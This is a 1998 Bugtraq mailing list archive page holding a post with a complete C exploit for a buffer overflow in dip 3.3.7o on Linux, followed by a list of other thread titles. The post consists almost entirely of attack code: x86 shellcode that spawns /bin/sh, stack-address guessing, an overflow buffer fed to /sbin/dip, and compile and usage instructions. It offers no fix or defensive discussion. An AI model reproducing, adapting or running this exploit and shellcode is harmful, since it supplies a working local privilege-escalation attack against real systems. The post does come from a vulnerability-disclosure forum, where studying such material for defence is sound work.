Bugtraq mailing list archives
dip 3.3.7 exploit
From: jamez () UGROUND ORG (jamez)
Date: Thu, 7 May 1998 20:06:47 +0000
Here an exploit for dip 3.3.7o buffer overflow. ----- cut here ----- /* dip 3.3.7o buffer overflow exploit for Linux. (May 7, 1998) coded by jamez. e-mail: jamez () uground org thanks to all ppl from uground. usage: gcc -o dip-exp dip3.3.7o-exp.c ./dip-exp offset (-100 to 100. probably 0. tested on slack 3.4) */ char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; #define SIZE 130 /* cause it's a little buffer, i wont use NOP's */ char buffer[SIZE]; unsigned long get_esp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char * argv[]) { int i = 0, offset = 0; long addr; if(argc > 1) offset = atoi(argv[1]); addr = get_esp() - offset - 0xcb; for(i = 0; i < strlen(shellcode); i++) buffer[i] = shellcode[i]; for (; i < SIZE; i += 4) { buffer[i ] = addr & 0x000000ff; buffer[i+1] = (addr & 0x0000ff00) >> 8; buffer[i+2] = (addr & 0x00ff0000) >> 16; buffer[i+3] = (addr & 0xff000000) >> 24; } buffer[SIZE - 1] = 0; execl("/sbin/dip", "dip", "-k", "-l", buffer, (char *)0); } ----- cut here ----- -- jamez () uground org
Current thread:
- Re: 3Com switches - undocumented access level. Mike Richichi (May 05)
- Re: 3Com switches - undocumented access level. Doug Hughes (May 06)
- <Possible follow-ups>
- Re: 3Com switches - undocumented access level. Durval Menezes (May 06)
- Re: 3Com switches - undocumented access level. Durval Menezes (May 06)
- Re: 3Com switches - undocumented access level. Jean-Francois Malouin (May 06)
- Re: 3Com switches - undocumented access level. Riku Meskanen (May 07)
- dip 3.3.7 exploit jamez (May 07)
- dip-3.3.7o exploit zef (May 07)
- Re: 3Com switches - undocumented access level. Eric Monti (May 07)
- Re: 3Com switches - undocumented access level. Sasha Egan (May 08)
- NSCA HTTPD (for Windows) bug. Renos (May 08)
- 4 Advisories for Digital Unix: ftp, advs, rpc.statd, ftpd Helmut Springer (May 08)
- xterm exploit [TOG issue] Andrea Arcangeli (May 08)
- BSDI 3.1/Squid Default Owner Jonathan A. Zdziarski (May 07)
- Re: 3Com switches - undocumented access level. Toh Chang Ying (May 08)
- Re: 3Com switches - undocumented access level. Aleph One (May 08)
- Re: 3Com switches - undocumented access level.) Riku Meskanen (May 09)